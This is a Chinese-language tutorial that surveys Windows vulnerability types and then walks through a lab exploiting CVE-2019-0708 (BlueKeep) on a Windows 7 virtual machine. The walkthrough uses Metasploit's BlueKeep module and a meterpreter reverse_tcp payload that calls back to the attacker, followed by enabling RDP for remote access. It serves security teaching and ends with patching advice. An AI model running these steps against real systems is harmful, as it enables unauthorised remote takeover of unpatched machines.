Window漏洞是指存在于Microsoft Windows操作系统中的安全漏洞,它们可能会被恶意用户利用来获取未经授权的访问权限、执行恶意代码或导致系统崩溃等问题。
Window漏洞的形式多种多样,以下是一些常见的Window漏洞类型:
缓冲区溢出漏洞:程序在处理输入时未能正确验证输入的大小,导致溢出写入到相邻的内存空间中,从而改变程序的执行流或覆盖重要数据。
整数溢出漏洞:程序在处理整数时未能正确验证其范围,可能导致数值溢出,从而产生意外的结果或破坏内存结构。
权限提升漏洞:存在于操作系统或其他应用程序中,可以被攻击者使用来提升其权限级别,从而访问受限资源或执行高权限操作。
代码执行漏洞:存在于操作系统或应用程序中,允许攻击者在受害者系统上执行恶意代码,可能导致数据泄露、系统崩溃或远程控制等问题。
逻辑错误漏洞:由于设计或实现上的逻辑错误,导致程序执行中存在漏洞,攻击者可以通过利用这些漏洞来绕过安全机制或达到非法操作的目的。
windows 7 cve-2019-0708漏洞实验:
1. 漏洞背景:CVE-2019-0708是一种远程桌面服务(RDS)远程代码执行漏洞,影响Windows 7操作系统。攻击者可以利用此漏洞在未经用户授权的情况下远程执行恶意代码并获取系统控制权。
2. 实验目的:通过实验验证漏洞存在,并了解攻击方法和影响范围,进一步加强系统安全防护和漏洞修复能力。
3. 实验方法:可以通过搭建实验环境,部署漏洞利用工具(如Metasploit)并尝试远程执行代码。或者使用现成的漏洞利用脚本进行攻击实验。
4. 实验结果:通过实验验证漏洞漏洞存在,并成功执行恶意代码,进而获取系统控制权。这突出了漏洞修补的重要性,并提醒用户及时升级操作系统补丁。
5. 修补措施:对于CVE-2019-0708漏洞,微软已经发布了安全补丁。为了确保系统安全,用户需要及时升级操作系统,并定期检查和安装最新的安全补丁。
实验准备工作:
1.开启Kali虚拟机和win7靶机
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
3.若3389没打开,可以右键计算机,选择属性
4.选择远程设置
5.选择允许远程连接
实验步骤:
1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:
Nmap xxx.xxx.xxx.xxx(win7IP)
2.确认开启后启动msfconsole
3. 搜索漏洞:
search 0708
前两个模块,一个是扫描功能,一个是攻击功能。
4.使用攻击功能,也就是第二个模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
5.设置目标:
set rhost 被攻击ip #设置win7ip
set rport 3389
6.设置payload:
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
7.设置攻击机:
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
8.输入:show targets,显示可以选择的靶机的架构
9.用于vm是15.5.1,所以可以选择target 3-5
10.选择target 3,进行尝试:
set target 3
11.进行攻击,运行:run
12.假如可以建立连接,输入:
run post/windows/manage/enable_rdp
运行远程桌面模块
13.另开一个kali终端,输入:
rdesktop win7靶机IP
利用Windows 7 CVE-2019-0708漏洞的实验验证了此漏洞的存在,并成功地执行了恶意代码,获取了系统控制权。实验结果强调了修补漏洞的重要性,以及及时升级操作系统和安装最新的安全补丁的必要性。这个实验提醒用户加强系统安全防护措施,避免黑客利用漏洞入侵系统,造成更严重的后果。